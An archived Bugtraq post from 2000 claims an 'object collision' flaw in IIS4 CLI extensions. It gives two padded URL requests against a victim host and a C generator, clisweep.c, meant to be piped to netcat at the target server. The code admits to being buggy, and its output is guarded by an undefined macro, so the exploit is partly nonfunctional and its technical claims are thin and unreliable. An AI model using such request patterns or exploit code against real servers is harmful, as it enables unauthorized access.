Bugtraq mailing list archives
Shinex vs. IIS CLI Extensions
From: dev-null () NO-ID COM (dev-null () NO-ID COM)
Date: Mon, 5 Jun 2000 12:31:38 -0000
[ This message has been sent anonymously due to configuration problems I'm experiencing with my mail server. If you would like to discuss the finepoints of this post, you're quite welcome to message me on Efnet (nickname: shinex). ] While doing a security audit on a WinNT 4.0 system, I discovered an `object collision` vulnerability that can potentially lead to remote compromise. The flaw lies in the mechanism employed by CLI objects to handle dynamic pre-auth requests from a stateful client. States of operation are inherent in the implementation itself. This flaw could lead to a determined attacker gaining administrative privileges on servers using this widely deployed object kit. EXPLOITATION NOTES ------------------ Request #1: http://www.victim.com/.....~518 chars.../[invocation of CLI object] Request #2: http://www.victim.com/.....~260 chars.../[request with req1 object as ext] Simple as that. It's important that both requests reach the target server within a timeframe of 15 seconds (a rough estimate). Your threshold may vary. Subsequent requests will be made with raised authorization levels. The rationale for the char padding will be available later in the followup post (see below). Microsoft has been notified and patching information should be forthcoming. While not as severe as the RDS vulnerability, it is still an avenue of attack that could provide a determined attacker with unauthorized access. (Allow me to mention in passing that the scarcity of detail in this paper is intentional. A more thorough assessment will be posted after Microsoft have released their hotfix.) HELPER CODE ----------- /* ** clisweep.c by shinex (efnet) ** Quick generator for IIS4 CLI extension vuln URLs. ** ** $ (./clisweep <cli object> ; cat) | nc www.victim.com 80 ** OK. This code is buggy, because I mistakingly thought ** that both requests would be delivered without having ** to restart netcat. I can't code network apps. Sorry. ** */ #include <stdio.h> #include <string.h> #include <unistd.h> #define DOT1 518 #define DOT2 260 #define THRESHOLD 15 #define RANDFILE "AABBCC" char *gendots(int); char *calc(char *); int main(int argc, char *argv[]) { char req1[1024], req2[1024]; if(argc != 2) { fprintf(stderr, "Usage: %s <cli object>\n", *argv); return -1; } sprintf(req1, "GET /%s/%s", gendots(DOT1), argv[1]); sprintf(req2, "GET /%s/%s", gendots(DOT2), calc(argv[1])); #ifdef SCRIPTKIDPROTECTION printf("%s\n\n", req1); sleep(THRESHOLD); printf("%s\n\n", req2); #endif return 0; } char *gendots(int num) { int i; static char dots[1024]; char *ptr = dots; for(i = 0; i < num; i++) *ptr++ = '.'; return dots; } char *calc(char *arg) { static char file[1024]; char *ptr; ptr = strrchr(arg, '.'); *ptr = '\0'; /* no error checks */ sprintf(file, "%s.%s", RANDFILE, arg); return file; } SHOUTOUTS --------- Greets to route and my other friends. -- This message has been sent via an anonymous mail relay at www.no-id.com.
Current thread:
- Shinex vs. IIS CLI Extensions dev-null () NO-ID COM (Jun 05)
- <Possible follow-ups>
- Re: Shinex vs. IIS CLI Extensions Microsoft Security Response Center (Jun 08)